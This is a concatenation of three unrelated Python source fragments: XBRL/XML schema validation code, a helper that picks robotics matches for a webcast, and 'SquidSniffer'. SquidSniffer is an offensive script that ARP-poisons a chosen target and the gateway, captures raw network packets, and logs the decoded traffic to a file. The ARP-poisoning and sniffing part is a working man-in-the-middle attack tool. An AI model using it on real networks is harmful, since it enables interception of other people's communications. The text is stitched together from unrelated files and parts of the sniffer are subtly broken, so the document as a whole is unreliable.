cMinusCNameChar = r"[_\-\." "\xB7A-Za-z0-9\xC0-\xD6\xD8-\xF6\xF8-\xFF\u0100-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD\u0300-\u036F\u203F-\u2040]"
baseXsdTypePatterns = {
"Name": namePattern,
"language": languagePattern,
"languageOrEmpty": re_compile(r"[a-zA-Z]{1,8}(-[a-zA-Z0-9]{1,8})*$|$"),
"NMTOKEN": NMTOKENPattern,
"NCName": NCNamePattern,
"ID": NCNamePattern,
"IDREF": NCNamePattern,
"ENTITY": NCNamePattern,
"QName": QNamePattern,
}
predefinedAttributeTypes = {
qname("{http://www.w3.org/XML/1998/namespace}xml:lang"):("languageOrEmpty",None),
qname("{http://www.w3.org/XML/1998/namespace}xml:space"):("NCName",{"enumeration":{"default","preserve"}})}
xAttributesSharedEmptyDict = {}
def validate(modelXbrl, elt, recurse=True, attrQname=None, ixFacts=False):
global ModelInlineValueObject, ixMsgCode
if ModelInlineValueObject is None:
from arelle.ModelInstanceObject import ModelInlineValueObject
from arelle.XhtmlValidate import ixMsgCode
isIxFact = isinstance(elt, ModelInlineValueObject)
facets = None
# attrQname can be provided for attributes that are global and LAX
if (getattr(elt,"xValid", UNVALIDATED) == UNVALIDATED) and (not isIxFact or ixFacts):
qnElt = elt.qname if ixFacts and isIxFact else elt.elementQname
modelConcept = modelXbrl.qnameConcepts.get(qnElt)
isAbstract = False
if modelConcept is not None:
isNillable = modelConcept.isNillable
type = modelConcept.type
if modelConcept.isAbstract:
baseXsdType = "noContent"
isAbstract = True
elif modelConcept.isFraction:
baseXsdType = "fraction"
else:
baseXsdType = modelConcept.baseXsdType
facets = modelConcept.facets
elif qnElt == XbrlConst.qnXbrldiExplicitMember: # not in DTS
baseXsdType = "QName"
type = None
isNillable = False
elif qnElt == XbrlConst.qnXbrldiTypedMember: # not in DTS
baseXsdType = "noContent"
type = None
isNillable = False
else:
baseXsdType = None
type = None
isNillable = True # allow nil if no schema definition
isNil = elt.get("{http://www.w3.org/2001/XMLSchema-instance}nil") in ("true", "1")
if attrQname is None:
if isNil and not isNillable:
if ModelInlineValueObject is not None and isinstance(elt, ModelInlineValueObject):
errElt = "{0} fact {1}".format(elt.elementQname, elt.qname)
else:
errElt = elt.elementQname
modelXbrl.error("xmlSchema:nilNonNillableElement",
_("Element %(element)s fact %(fact)s type %(typeName)s is nil but element has not been defined nillable"),
modelObject=elt, element=errElt, fact=elt.qname,
typeName=modelConcept.baseXsdType if modelConcept is not None else "unknown")
try:
if isAbstract:
raise ValueError("element is abstract")
if isNil:
text = ""
elif baseXsdType == "noContent":
text = elt.textValue # no descendant text nodes
else:
text = elt.stringValue # include descendant text nodes
if modelConcept is not None:
if len(text) == 0:
if modelConcept.default is not None:
text = modelConcept.default
elif modelConcept.fixed is not None:
text = modelConcept.fixed
if baseXsdType == "token" and modelConcept.isEnumeration:
if modelConcept.instanceOfType(XbrlConst.qnEnumeration2ItemTypes):
baseXsdType = "enumerationHrefs"
else:
baseXsdType = "enumerationQNames"
except Exception as err:
if ModelInlineValueObject is not None and isinstance(elt, ModelInlineValueObject):
errElt = "{0} fact {1}".format(elt.elementQname, elt.qname)
else:
errElt = elt.elementQname
if isIxFact and err.__class__.__name__ == "FunctionArgType":
modelXbrl.error(ixMsgCode("transformValueError", elt),
_("Inline element %(element)s fact %(fact)s type %(typeName)s transform %(transform)s value error: %(value)s"),
modelObject=elt, element=errElt, fact=elt.qname, transform=elt.format,
typeName=modelConcept.baseXsdType if modelConcept is not None else "unknown",
value=XmlUtil.innerText(elt, ixExclude=True, ixContinuation=elt.namespaceURI==XbrlConst.ixbrl11))
elif isIxFact and err.__class__.__name__ == "ixtFunctionNotAvailable":
modelXbrl.error(ixMsgCode("invalidTransformation", elt, sect="validation"),
_("Fact %(fact)s has unrecognized transformation %(transform)s, value: %(value)s"),
modelObject=elt, element=errElt, fact=elt.qname, transform=elt.format,
typeName=modelConcept.baseXsdType if modelConcept is not None else "unknown",
value=XmlUtil.innerText(elt, ixExclude=True, ixContinuation=elt.namespaceURI==XbrlConst.ixbrl11))
elif isAbstract:
modelXbrl.error("xmlSchema:abstractElement",
_("Element %(element)s has abstract declaration, value: %(value)s"),
modelObject=elt, element=errElt, error=str(err), value=elt.text)
else:
modelXbrl.error("xmlSchema:valueError",
_("Element %(element)s error %(error)s value: %(value)s"),
modelObject=elt, element=errElt, error=str(err), value=elt.text)
elt.sValue = elt.xValue = text = INVALIDixVALUE
elt.xValid = INVALID
if text is not INVALIDixVALUE:
validateValue(modelXbrl, elt, None, baseXsdType, text, isNillable, isNil, facets)
# note that elt.sValue and elt.xValue are not innerText but only text elements on specific element (or attribute)
if type is not None:
definedAttributes = type.attributes
else:
definedAttributes = {}
presentAttributes = set()
# validate attributes
# find missing attributes for default values
for attrTag, attrValue in elt.items():
qn = qnameClarkName(attrTag)
#qn = qname(attrTag, noPrefixIsNoNamespace=True)
baseXsdAttrType = None
facets = None
if attrQname is not None: # validate all attributes and element
if attrQname != qn:
continue
elif type is not None:
presentAttributes.add(qn)
if qn in definedAttributes: # look for concept-type-specific attribute definition
modelAttr = definedAttributes[qn]
elif qn.namespaceURI: # may be a globally defined attribute
modelAttr = modelXbrl.qnameAttributes.get(qn)
else:
modelAttr = None
if modelAttr is not None:
baseXsdAttrType = modelAttr.baseXsdType
facets = modelAttr.facets
if baseXsdAttrType is None: # look for global attribute definition
attrObject = modelXbrl.qnameAttributes.get(qn)
if attrObject is not None:
baseXsdAttrType = attrObject.baseXsdType
facets = attrObject.facets
elif attrTag == "{http://xbrl.org/2006/xbrldi}dimension": # some fallbacks?
baseXsdAttrType = "QName"
elif attrTag == "id":
baseXsdAttrType = "ID"
elif elt.namespaceURI == "http://www.w3.org/2001/XMLSchema":
if attrTag in {"type", "ref", "base", "refer", "itemType"}:
baseXsdAttrType = "QName"
elif attrTag in {"name"}:
baseXsdAttrType = "NCName"
elif attrTag in {"default", "fixed", "form"}:
baseXsdAttrType = "string"
elif elt.namespaceURI == "http://xbrl.org/2006/xbrldi":
if attrTag == "dimension":
baseXsdAttrType = "QName"
elif qn in predefinedAttributeTypes:
baseXsdAttrType, facets = predefinedAttributeTypes[qn]
validateValue(modelXbrl, elt, attrTag, baseXsdAttrType, attrValue, facets=facets)
# if no attributes assigned above, there won't be an xAttributes, if so assign a shared dict to save memory
try:
elt.xAttributes
except AttributeError:
elt.xAttributes = xAttributesSharedEmptyDict
if type is not None:
if attrQname is None:
missingAttributes = type.requiredAttributeQnames - presentAttributes - elt.slottedAttributesNames
if missingAttributes:
modelXbrl.error("xmlSchema:attributesRequired",
_("Element %(element)s type %(typeName)s missing required attributes: %(attributes)s"),
modelObject=elt,
element=qnElt,
typeName=baseXsdType,
attributes=','.join(str(a) for a in missingAttributes))
extraAttributes = presentAttributes - _DICT_SET(definedAttributes.keys()) - XbrlConst.builtinAttributes
if extraAttributes:
attributeWildcards = type.attributeWildcards
extraAttributes -= set(a
for a in extraAttributes
if validateAnyWildcard(qnElt, a, attributeWildcards))
if isIxFact:
extraAttributes -= XbrlConst.ixAttributes
if extraAttributes:
modelXbrl.error("xmlSchema:attributesExtraneous",
_("Element %(element)s type %(typeName)s extraneous attributes: %(attributes)s"),
modelObject=elt,
element=qnElt,
typeName=baseXsdType,
attributes=','.join(str(a) for a in extraAttributes))
# add default attribute values
for attrQname in (type.defaultAttributeQnames - presentAttributes):
modelAttr = type.attributes[attrQname]
validateValue(modelXbrl, elt, attrQname.clarkNotation, modelAttr.baseXsdType, modelAttr.default, facets=modelAttr.facets)
if recurse:
global validateElementSequence, modelGroupCompositorTitle
if validateElementSequence is None:
from arelle.XmlValidateParticles import validateElementSequence, modelGroupCompositorTitle
try:
#childElts = list(elt) # uses __iter__ for inline facts
childElts = [e for e in elt if isinstance(e, ModelObject)]
if isNil:
if childElts or elt.text:
modelXbrl.error("xmlSchema:nilElementHasContent",
_("Element %(element)s is nil but has contents"),
modelObject=elt,
element=qnElt)
else:
errResult = validateElementSequence(modelXbrl, type, childElts, ixFacts)
if errResult is not None and errResult[2]:
iElt, occured, errDesc, errArgs = errResult
errElt = childElts[iElt] if iElt < len(childElts) else elt
errArgs["modelObject"] = errElt
errArgs["element"] = errElt.qname
errArgs["parentElement"] = elt.qname
if "compositor" in errArgs: # compositor is an object, provide friendly string
errArgs["compositor"] = modelGroupCompositorTitle(errArgs["compositor"])
modelXbrl.error(*errDesc,**errArgs)
# when error is in an xbrli element, check any further unvalidated children
if qnElt.namespaceURI == XbrlConst.xbrli and iElt < len(childElts):
for childElt in childElts[iElt:]:
if (getattr(childElt,"xValid", UNVALIDATED) == UNVALIDATED):
validate(modelXbrl, childElt, ixFacts=ixFacts)
recurse = False # cancel child element validation below, recursion was within validateElementSequence
except AttributeError as ex:
raise ex
#pass # HF Why is this here????
if recurse: # if there is no complex or simple type (such as xbrli:measure) then this code is used
for child in (elt.modelTupleFacts if ixFacts and isIxFact else elt):
if isinstance(child, ModelObject):
validate(modelXbrl, child, recurse, attrQname, ixFacts)
def validateValue(modelXbrl, elt, attrTag, baseXsdType, value, isNillable=False, isNil=False, | |
import cloudstorage
import datetime
import json
import logging
from helpers.firebase.firebase_pusher import FirebasePusher
from helpers.match_helper import MatchHelper
from helpers.outgoing_notification_helper import OutgoingNotificationHelper
from models.event import Event
from models.match import Match
from models.sitevar import Sitevar
class BlueZoneHelper(object):
TIME_PATTERN = "%Y-%m-%dT%H:%M:%S"
MAX_TIME_PER_MATCH = datetime.timedelta(minutes=5)
# BUFFER_AFTER = datetime.timedelta(minutes=4)
TIME_BUCKET = datetime.timedelta(minutes=5)
@classmethod
def get_upcoming_matches(cls, live_events, n=1):
matches = []
for event in live_events:
upcoming_matches = MatchHelper.upcomingMatches(event.matches, n)
matches.extend(upcoming_matches)
return matches
@classmethod
def get_upcoming_match_predictions(cls, live_events):
predictions = {}
for event in live_events:
if event.details and event.details.predictions:
try:
predictions.update(event.details.predictions.get('match_predictions', {}))
except Exception, e:
logging.info("get_upcoming_match_predictions failed!")
logging.info(e)
return predictions
# @classmethod
# def should_add_match(cls, matches, candidate_match, current_match, predictions, current_timeout):
# now = datetime.datetime.now()
# if current_match and candidate_match.key_name == current_match.key_name and current_timeout is not None and now > current_timeout:
# # We've been on this match for too long, try something else
# return None
# if candidate_match.predicted_time > now + cls.MAX_TIME_PER_MATCH:
# # If this match starts too far in the future, don't include it
# return None
# # If this match conflicts with the current match, don't bother trying
# if current_match and candidate_match.predicted_time <= current_match.predicted_time + cls.BUFFER_AFTER:
# return None
# # Can we put this match in the beginning of the list?
# if not matches or candidate_match.predicted_time + cls.BUFFER_AFTER <= matches[0].predicted_time:
# return 0
# for i in range(1, len(matches)):
# # Can we insert this match in between these two
# last_match = matches[i - 1]
# next_match = matches[i]
# if candidate_match.predicted_time >= last_match.predicted_time + cls.BUFFER_AFTER:
# if candidate_match.predicted_time + cls.BUFFER_AFTER <= next_match.predicted_time:
# if candidate_match.key_name in predictions:
# return i
# # Can we put this match at the end of the list?
# if matches and candidate_match.predicted_time >= matches[-1].predicted_time + cls.BUFFER_AFTER:
# return len(matches)
# return None
@classmethod
def calculate_match_hotness(cls, matches, predictions):
max_hotness = 0
min_hotness = float('inf')
for match in matches:
if not match.has_been_played and match.key.id() in predictions:
prediction = predictions[match.key.id()]
red_score = prediction['red']['score']
blue_score = prediction['blue']['score']
if red_score > blue_score:
winner_score = red_score
loser_score = blue_score
else:
winner_score = blue_score
loser_score = red_score
hotness = winner_score + 2.0*loser_score # Favor close high scoring matches
max_hotness = max(max_hotness, hotness)
min_hotness = min(min_hotness, hotness)
match.hotness = hotness
else:
match.hotness = 0
for match in matches:
match.hotness = 100 * (match.hotness - min_hotness) / (max_hotness - min_hotness)
@classmethod
def build_fake_event(cls):
return Event(id='bluezone',
name='TBA BlueZone (BETA)',
event_short='bluezone',
year=datetime.datetime.now().year,
webcast_json=json.dumps([{'type': 'twitch', 'channel': 'firstinspires'}])) # Default to this webcast
@classmethod
def update_bluezone(cls, live_events):
"""
Find the current best match to watch
Currently favors showing something over nothing, is okay with switching
TO a feed in the middle of a match, but avoids switching FROM a feed
in the middle of a match.
1. Get the earliest predicted unplayed match across all live events
2. Get all matches that start within TIME_BUCKET of that match
3. Switch to hottest match in that bucket unless MAX_TIME_PER_MATCH is
hit (in which case blacklist for the future)
4. Repeat
"""
now = datetime.datetime.now()
logging.info("[BLUEZONE] Current time: {}".format(now))
to_log = '--------------------------------------------------\n'
to_log += "[BLUEZONE] Current time: {}\n".format(now)
slack_sitevar = Sitevar.get_or_insert('slack.hookurls')
slack_url = None
if slack_sitevar:
slack_url = slack_sitevar.contents.get('bluezone', '')
bluezone_config = Sitevar.get_or_insert('bluezone')
logging.info("[BLUEZONE] Config (updated {}): {}".format(bluezone_config.updated, bluezone_config.contents))
to_log += "[BLUEZONE] Config (updated {}): {}\n".format(bluezone_config.updated, bluezone_config.contents)
current_match_key = bluezone_config.contents.get('current_match')
last_match_key = bluezone_config.contents.get('last_match')
current_match_predicted_time = bluezone_config.contents.get('current_match_predicted')
if current_match_predicted_time:
current_match_predicted_time = datetime.datetime.strptime(current_match_predicted_time, cls.TIME_PATTERN)
current_match_switch_time = bluezone_config.contents.get('current_match_switch_time')
if current_match_switch_time:
current_match_switch_time = datetime.datetime.strptime(current_match_switch_time, cls.TIME_PATTERN)
else:
current_match_switch_time = now
blacklisted_match_keys = bluezone_config.contents.get('blacklisted_matches', set())
if blacklisted_match_keys:
blacklisted_match_keys = set(blacklisted_match_keys)
blacklisted_event_keys = bluezone_config.contents.get('blacklisted_events', set())
if blacklisted_event_keys:
blacklisted_event_keys = set(blacklisted_event_keys)
current_match = Match.get_by_id(current_match_key) if current_match_key else None
last_match = Match.get_by_id(last_match_key) if last_match_key else None
logging.info("[BLUEZONE] live_events: {}".format([le.key.id() for le in live_events]))
to_log += "[BLUEZONE] live_events: {}\n".format([le.key.id() for le in live_events])
live_events = filter(lambda e: e.webcast_status != 'offline', live_events)
for event in live_events: # Fetch all matches and details asynchronously
event.prep_matches()
event.prep_details()
logging.info("[BLUEZONE] Online live_events: {}".format([le.key.id() for le in live_events]))
to_log += "[BLUEZONE] Online live_events: {}\n".format([le.key.id() for le in live_events])
upcoming_matches = cls.get_upcoming_matches(live_events)
upcoming_matches = filter(lambda m: m.predicted_time is not None, upcoming_matches)
upcoming_predictions = cls.get_upcoming_match_predictions(live_events)
# (1, 2) Find earliest predicted unplayed match and all other matches
# that start within TIME_BUCKET of that match
upcoming_matches.sort(key=lambda match: match.predicted_time)
potential_matches = []
time_cutoff = None
logging.info("[BLUEZONE] all upcoming matches sorted by predicted time: {}".format([um.key.id() for um in upcoming_matches]))
to_log += "[BLUEZONE] all upcoming sorted by predicted time: {}\n".format([um.key.id() for um in upcoming_matches])
for match in upcoming_matches:
if match.predicted_time:
if time_cutoff is None:
time_cutoff = match.predicted_time + cls.TIME_BUCKET
potential_matches.append(match)
elif match.predicted_time < time_cutoff:
potential_matches.append(match)
else:
break # Matches are sorted by predicted_time
logging.info("[BLUEZONE] potential_matches sorted by predicted time: {}".format([pm.key.id() for pm in potential_matches]))
to_log += "[BLUEZONE] potential_matches sorted by predicted time: {}\n".format([pm.key.id() for pm in potential_matches])
# (3) Choose hottest match that's not blacklisted
cls.calculate_match_hotness(potential_matches, upcoming_predictions)
potential_matches.sort(key=lambda match: -match.hotness)
logging.info("[BLUEZONE] potential_matches sorted by hotness: {}".format([pm.key.id() for pm in potential_matches]))
to_log += "[BLUEZONE] potential_matches sorted by hotness: {}\n".format([pm.key.id() for pm in potential_matches])
bluezone_matches = []
new_blacklisted_match_keys = set()
# If the current match hasn't finished yet, don't even bother
cutoff_time = current_match_switch_time + cls.MAX_TIME_PER_MATCH
logging.info("[BLUEZONE] Current match played? {}, now = {}, cutoff = {}".format(current_match.has_been_played if current_match else None, now, cutoff_time))
to_log += "[BLUEZONE] Current match played? {}, now = {}, cutoff = {}\n".format(current_match.has_been_played if current_match else None, now, cutoff_time)
if current_match and not current_match.has_been_played and now < cutoff_time \
and current_match_key not in blacklisted_match_keys \
and current_match.event_key_name not in blacklisted_event_keys:
logging.info("[BLUEZONE] Keeping current match {}".format(current_match.key.id()))
to_log += "[BLUEZONE] Keeping current match {}\n".format(current_match.key.id())
bluezone_matches.append(current_match)
for match in potential_matches:
if len(bluezone_matches) >= 2: # one current, one future
break
logging.info("[BLUEZONE] Trying potential match: {}".format(match.key.id()))
to_log += "[BLUEZONE] Trying potential match: {}\n".format(match.key.id())
if filter(lambda m: m.key.id() == match.key.id(), bluezone_matches):
logging.info("[BLUEZONE] Match {} already chosen".format(match.key.id()))
to_log += "[BLUEZONE] Match {} already chosen\n".format(match.key.id())
continue
if match.event_key_name in blacklisted_event_keys:
logging.info("[BLUEZONE] Event {} is blacklisted, skipping...".format(match.event_key_name))
to_log += "[BLUEZONE] Event {} is blacklisted, skipping...\n".format(match.event_key_name)
continue
if match.key.id() not in blacklisted_match_keys:
if match.key.id() == current_match_key:
if current_match_predicted_time and cutoff_time < now and len(potential_matches) > 1:
# We've been on this match too long
new_blacklisted_match_keys.add(match.key.id())
logging.info("[BLUEZONE] Adding match to blacklist: {}".format(match.key.id()))
to_log += "[BLUEZONE] Adding match to blacklist: {}\n".format(match.key.id())
logging.info("[BLUEZONE] scheduled time: {}, now: {}".format(current_match_predicted_time, now))
to_log += "[BLUEZONE] scheduled time: {}, now: {}\n".format(current_match_predicted_time, now)
OutgoingNotificationHelper.send_slack_alert(slack_url, "Blacklisting match {}. Predicted time: {}, now: {}".format(match.key.id(), current_match_predicted_time, now))
else:
# We can continue to use this match
bluezone_matches.append(match)
logging.info("[BLUEZONE] Continuing to use match: {}".format(match.key.id()))
to_log += "[BLUEZONE] Continuing to use match: {}\n".format(match.key.id())
else:
# Found a new good match
bluezone_matches.append(match)
logging.info("[BLUEZONE] Found a good new match: {}".format(match.key.id()))
to_log += "[BLUEZONE] Found a good new match: {}\n".format(match.key.id())
else:
logging.info("[BLUEZONE] Match already blacklisted: {}".format(match.key.id()))
to_log += "[BLUEZONE] Match already blacklisted: {}\n".format(match.key.id())
new_blacklisted_match_keys.add(match.key.id())
if not bluezone_matches:
logging.info("[BLUEZONE] No match selected")
to_log += "[BLUEZONE] No match selected\n"
logging.info("[BLUEZONE] All selected matches: {}".format([m.key.id() for m in bluezone_matches]))
to_log += "[BLUEZONE] All selected matches: {}\n".format([m.key.id() for m in bluezone_matches])
# (3) Switch to hottest match
fake_event = cls.build_fake_event()
if bluezone_matches:
bluezone_match = bluezone_matches[0]
real_event = filter(lambda x: x.key_name == bluezone_match.event_key_name, live_events)[0]
# Create Fake event for return
fake_event.webcast_json = json.dumps([real_event.current_webcasts[0]])
if bluezone_match.key_name != current_match_key:
current_match_switch_time = now
logging.info("[BLUEZONE] Switching to: {}".format(bluezone_match.key.id()))
to_log += "[BLUEZONE] Switching to: {}\n".format(bluezone_match.key.id())
OutgoingNotificationHelper.send_slack_alert(slack_url, "It is now {}. Switching BlueZone to {}, scheduled for {} and predicted to be at {}.".format(now, bluezone_match.key.id(), bluezone_match.time, bluezone_match.predicted_time))
if not current_match or current_match.has_been_played:
last_match = current_match
# Only need to update if things changed
if bluezone_match.key_name != current_match_key or new_blacklisted_match_keys != blacklisted_match_keys:
FirebasePusher.update_event(fake_event)
bluezone_config.contents = {
'current_match': bluezone_match.key.id(),
'last_match': last_match.key.id() if last_match else '',
'current_match_predicted': bluezone_match.predicted_time.strftime(cls.TIME_PATTERN),
'blacklisted_matches': list(new_blacklisted_match_keys),
'blacklisted_events': list(blacklisted_event_keys),
'current_match_switch_time': current_match_switch_time.strftime(cls.TIME_PATTERN),
}
bluezone_config.put()
# Log to cloudstorage
log_dir = '/tbatv-prod-hrd.appspot.com/tba-logging/bluezone/'
log_file = 'bluezone_{}.txt'.format(now.date())
full_path = log_dir + log_file
existing_contents = ''
if full_path in set([f.filename for f in cloudstorage.listbucket(log_dir)]):
with cloudstorage.open(full_path, 'r') as existing_file:
existing_contents = existing_file.read()
with cloudstorage.open(full_path, 'w') as new_file:
new_file.write(existing_contents + to_log)
bluezone_matches.insert(0, last_match)
bluezone_matches = filter(lambda m: m is | |
<reponame>Egida/Ethical-Hacking-Scripts<gh_stars>10-100
import socket, binascii, struct, os, sys, time, threading
from optparse import OptionParser
from scapy.all import *
class OptionParse:
def __init__(self):
self.arg_parse()
def logo(self):
print("""\033[0;31;40m
_____ _ _ _____ _ __ __ __ ___
/ ____| (_) | |/ ____| (_)/ _|/ _| /_ | / _ \
| (___ __ _ _ _ _ __| | (___ _ __ _| |_| |_ ___ _ __ __ _| || | | |
\___ \ / _` | | | | |/ _` |\___ \| '_ \| | _| _/ _ \ '__| \ \ / / || | | |
____) | (_| | |_| | | (_| |____) | | | | | | | || __/ | \ V /| || |_| |
|_____/ \__, |\__,_|_|\__,_|_____/|_| |_|_|_| |_| \___|_| \_/ |_(_)___/
| |
|_|
Packet-Sniffing Script by DrSquid""")
def usage(self):
self.logo()
print("""
[+] Option Parsing Help:
[+] -t, --translate - Script translate any incoming traffic and displays it in the output.
[+] -r, --raw - Script displays raw network traffic in output.
[+] -l, --log - Script Logs Network Traffic headers.
[+] -i, --info - Shows this message.
[+] -p, --poison - ARP Poisons a specified IP.
[+] -a, --address - Only Display Traffic from the provided IP Address.
[+] Usage:
[+] python3 SquidSniffer.py -t -r
[+] python3 SquidSniffer.py -t -a <ipaddress> -p <ipaddress>
[+] python3 SquidSniffer.py -i
""")
def arg_parse(self):
args = OptionParser()
args.add_option("-t","--translate", action="store_true", dest="translate")
args.add_option("-r","--raw",action="store_true",dest="raw")
args.add_option("-i","--info",action="store_true",dest="info")
args.add_option("-l", "--log", action="store_true", dest="log")
args.add_option("-p", "--poison", dest="poisontarget")
args.add_option("-a", "--address", dest="address")
opt,arg = args.parse_args()
if opt.info is not None:
self.usage()
sys.exit()
else:
pass
if opt.poisontarget is not None:
poison = opt.poisontarget
else:
poison = None
if opt.address is not None:
address = opt.address
else:
address = None
if opt.translate is not None:
translate = True
else:
translate = False
if opt.log is not None:
log = True
else:
log = False
if opt.raw is not None:
raw = True
else:
raw = False
self.logo()
sniffer = PacketSniffer(translate, raw, log, poison, address)
print("[+] Preparing to recieve packets......\n")
time.sleep(5)
sniffing = threading.Thread(target=sniffer.sniffing)
sniffing.start()
class ARP_Poisoner:
def __init__(self, targ_ip, gate_ip):
self.targ_ip = targ_ip
self.gate_ip = gate_ip
def obtain_macaddress(self, ip):
arpbroadcast = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=ip)
recv = srp(arpbroadcast, timeout=2, verbose=False)
return recv[0][0][1].hwsrc
def send_arp_pkt(self, targetip, targetmac, sourceip):
packet = ARP(op=2, pdst=targetip, psrc=sourceip, hwdst=targetmac)
send(packet, verbose=False)
def restore_arp(self, targetip, targetmac, sourceip, sourcemac):
packet = ARP(op=2, hwsrc=sourcemac, psrc=sourceip, hwdst=targetmac, pdst=targetip)
send(packet, verbose=False)
print(f"[+] ARP Table Restored For: {targetip}")
def arp_poison(self):
try:
self.gate_mac = self.obtain_macaddress(self.gate_ip)
print(f"[+] Gateway MAC: {self.gate_mac}")
except:
print(f"[+] Unable to Obtain MAC Address for {self.gate_ip}")
sys.exit()
try:
self.targ_mac = self.obtain_macaddress(self.targ_ip)
print(f"[+] Target MAC: {self.targ_mac}")
except:
print(f"[+] Unable to Obtain MAC Address for {self.targ_ip}")
sys.exit()
print("\n[+] Sending ARP-Poisoning Packets to Targets\n[+] Do CTRL+C To Stop Arp Poisoning.\n")
while True:
try:
self.send_arp_pkt(self.targ_ip, self.targ_mac, self.gate_ip)
self.send_arp_pkt(self.gate_ip, self.gate_mac, self.targ_ip)
except:
self.restore_arp(self.gate_ip, self.gate_mac, self.targ_ip, self.targ_mac)
self.restore_arp(self.targ_ip, self.targ_mac, self.gate_ip, self.gate_mac)
break
class PacketSniffer:
def __init__(self, translate=False, raw=False, log=False, poison=None, address=None):
self.os = os.name
self.poison = poison
self.logger = bool(log)
self.translat = bool(translate)
self.address = address
self.raw = bool(raw)
self.hastarget = False
if self.address is not None:
try:
self.hastarget = True
self.targ_mac = ARP_Poisoner.obtain_macaddress(None, self.address)
print(f"[+] Obtained MAC Address of {self.address}: {self.targ_mac}")
except:
print(f"[+] Unable to Obtain MAC Address of {self.address}.")
print("[+] Check you arguements.")
sys.exit()
self.translationfile = ['ÿ ff', 'a 61', 'b 62', 'c 63', 'd 64', 'e 65', 'f 66', 'g 67', 'h 68', 'i 69', 'j 6a', 'k 6b', 'l 6c', 'm 6d', 'n 6e', 'o 6f', 'p 70', 'q 71', 'r 72', 's 73', 't 74', 'u 75', 'v 76', 'w 77', 'x 78', 'y 79', 'z 7a', 'A 41', 'B 42', 'C 43', 'D 44', 'E 45', 'F 46', 'G 47', 'H 48', 'I 49', 'J 4a', 'K 4b', 'L 4c', 'M 4d', 'N 4e', 'O 4f', 'P 50', 'Q 51', 'R 52', 'S 53', 'T 54', 'U 55', 'V 56', 'W 57', 'X 58', 'Y 59', 'Z 5a', '0 30', '1 31', '2 32', '3 33', '4 34', '5 35', '6 36', '7 37', '8 38', '9 39', 'ˆ 88', '. 00', 'þ fe', '¶ b6', 'ž 9e', 'Ñ d1', 'Ë cb', '@ 40', ': 3a',"' 27",'" 22', "/ 2f", '\\ 5c', '$ 24', '% 25', '^ 5e', '& 26', '* 2a', '( 28', ') 29', '[ 5b', '] 5d', '{ 7b', '} 7d', 'ù f9', '© a9', 'À c0', 'ª aa', '¾ be', 'Û db', 'Ç c7']
self.logfile = "captured_traffic.txt"
print(f"[+] All Traffic Will be Logged.\n[+] Log File: {self.logfile}")
if self.poison is not None:
self.arp_poison = ARP_Poisoner(self.poison, "192.168.0.1")
self.arp_poisoner = threading.Thread(target=self.arp_poison.arp_poison)
self.arp_poisoner.start()
if self.os == "nt":
try:
self.sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_IP)
self.sniffer.bind((socket.gethostbyname(socket.gethostname()), 0))
self.sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
self.sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
except:
print("[+] Error with binding socket.")
print("[+] Run this script as admin!")
sys.exit()
else:
self.sniffer = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800))
def eth_header(self, data):
storeobj = data
storeobj = struct.unpack("!6s6sH", storeobj)
destination_mac = binascii.hexlify(storeobj[0])
source_mac = binascii.hexlify(storeobj[1])
eth_protocol = storeobj[2]
dest_mac = ""
src_mac = ""
try:
item = 0
for i in source_mac.decode():
src_mac += i
item += 1
if item == 2:
item = 0
src_mac += ":"
item = 0
for i in destination_mac.decode():
dest_mac += i
item += 1
if item == 2:
item = 0
dest_mac += ":"
except:
pass
data = {"Source Mac": src_mac,
"Destination Mac": dest_mac,
"Protocol": eth_protocol}
return data
def ip_header(self, data):
storeobj = struct.unpack("!BBHHHBBH4s4s", data)
version = storeobj[0]
tos = storeobj[1]
total_length = storeobj[2]
identification = storeobj[3]
fragment_Offset = storeobj[4]
ttl = storeobj[5]
protocol = storeobj[6]
header_checksum = storeobj[7]
source_address = socket.inet_ntoa(storeobj[8])
destination_address = socket.inet_ntoa(storeobj[9])
data = {'Version': version,
"Tos": tos,
"Total Length": total_length,
"Identification": identification,
"Fragment": fragment_Offset,
"TTL": ttl,
"Protocol": protocol,
"Header CheckSum": header_checksum,
"Source Address": source_address,
"Destination Address": destination_address}
return data
def tcp_header(self, data):
storeobj = struct.unpack('!HHLLBBHHH', data)
source_port = storeobj[0]
destination_port = storeobj[1]
sequence_number = storeobj[2]
acknowledge_number = storeobj[3]
offset_reserved = storeobj[4]
tcp_flag = storeobj[5]
window = storeobj[6]
checksum = storeobj[7]
urgent_pointer = storeobj[8]
data = {"Source Port": source_port,
"Destination Port": destination_port,
"Sequence Number": sequence_number,
"Acknowledge Number": acknowledge_number,
"Offset & Reserved": offset_reserved,
"TCP Flag": tcp_flag,
"Window": window,
"CheckSum": checksum,
"Urgent Pointer": urgent_pointer
}
return data
def translatebyte(self, byte):
result = ""
flag = 0
for i in self.translationfile:
if byte in i:
i = i.split()
flag = 1
return i[0]
if flag == 0:
return "."
def translate(self, datas, src_ip, dst_ip):
result = ""
split_data = ""
item = 0
for i in datas:
split_data += i
item += 1
if item == 2:
split_data += " "
item = 0
for data in split_data.split():
add = self.translatebyte(data)
result += add
if self.raw:
print(f"\n[+]: Raw Network Traffic:")
print(f" {split_data}")
self.log(f"\n[(RAW)({src_ip})---->({dst_ip})]: {split_data}\n[(DECODED)({src_ip})---->({dst_ip})]: {result}")
return result
def log(self, item):
try:
file = open(self.logfile,"r")
contents = file.read()
file.close()
except:
pass
file = open(self.logfile,"w")
try:
file.write(contents)
except:
pass
file.write(item)
file.close()
def sniffing(self):
while True:
try:
if self.hastarget:
desired_target = False
pkt = self.sniffer.recvfrom(65565)
self.log(f"\n\n[(RECV)] Raw Packets Received: {pkt}")
if self.raw:
print(f"\n[+] Raw Packets Recieved: {pkt}")
if self.logger:
self.log(msg)
for i in self.eth_header(pkt[0][0:14]).items():
a, b = i
if desired_target:
print(f"[+] {a} | {b}")
if self.targ_mac in b:
msg = "\n[+] Ethernet Header:"
print(msg)
print(f"[+] {a} | {b}")
desired_target = True
else:
break
if self.logger:
self.log(f"\n[+] {a} | {b}")
if desired_target:
msg = "\n[+] IP Header:"
print(msg)
if self.logger:
self.log(msg)
